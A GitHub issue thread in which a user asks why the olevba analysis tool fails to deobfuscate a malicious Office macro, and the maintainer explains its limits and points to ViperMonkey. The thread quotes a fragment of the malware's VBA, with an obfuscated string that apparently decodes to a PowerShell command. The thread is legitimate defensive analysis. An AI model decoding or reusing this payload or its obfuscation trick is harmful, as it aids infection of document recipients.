### ISSUE TITLE
Unable to deobfuscate this hash.

### ISSUE THREAD

**Issue by mhanne0915** [decalage2/oletools#193]
Hash: 67e31bd51386bd8103e94c98b592f8b50ded2cd0dda6343fa2423b0acb101835

Problem: olevba successfully parsed the vba inside the document file. But when i tried decode and deobfuscate options. olevba failed to get the deobfuscated string (powershell code). I noticed that the sample uses label1.height as a parameter of the deobfuscation function, which i think olevba failed to emulate.

`Sub cloovas()
Dim ind As Integer
ind = UserForm1.Label1.Height
Dim s As String
s = "dne38!0d!QMpxfsMTifmmMR!R#(QpMxfsT38Rifmm8R!##gvModuj88MpR8R" + DataTextShow()
s = s + "Mdi0g3MfsM38btlps3tfs33/qo88h((*R33~(3#3#!MM}R8!8PvMu.GjmRRf!.R8Rfod3pRejoh!3BTDRM8JJ!.8M8GjmfQ3bui!M&UMRNQ8M3&]U3jcR3Rcun/8Rcbu<33T38ubsMRMu.RQs3R8pd8ftt!MM(&UN3MQM&]Uj3cc3u3RMn/Rc3bu3(!.Xj8oepRxTRRRuz3mf!MRIjReefo#38"
Dim sder As String
sder = datetimeout(ind, s) --> this is the deobfuscate function of the malware
End Sub`

**Comment by decalage2** [comment]
Hi @mhanne0915, indeed olevba does not emulate VBA code, so it cannot deobfuscate this sample.

When you use the options --deobf or --reveal, olevba uses a partial VBA parser to identify VBA string expressions. Then it tries to deobfuscate those expressions if they are constant expressions.
This is not really VBA emulation, and for example it cannot handle variables or function calls.

For actual VBA emulation, check ViperMonkey: https://github.com/decalage2/ViperMonkey
It won't work (yet) with this sample, because I have not implemented the Ubound function yet.
